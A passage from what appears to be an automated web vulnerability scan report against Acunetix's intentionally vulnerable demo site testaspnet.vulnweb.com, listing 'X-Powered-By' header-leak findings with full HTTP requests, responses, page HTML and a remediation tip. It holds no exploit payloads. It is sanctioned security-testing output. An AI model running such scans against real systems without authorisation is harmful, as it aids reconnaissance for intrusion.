          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        17. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17827
          
          
          Response body (17827 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK30rH2AgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9jwc/cRnTJwdNTwN8SPSTaigKqpw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        18. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 22752
          
          
          Response body (22752 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
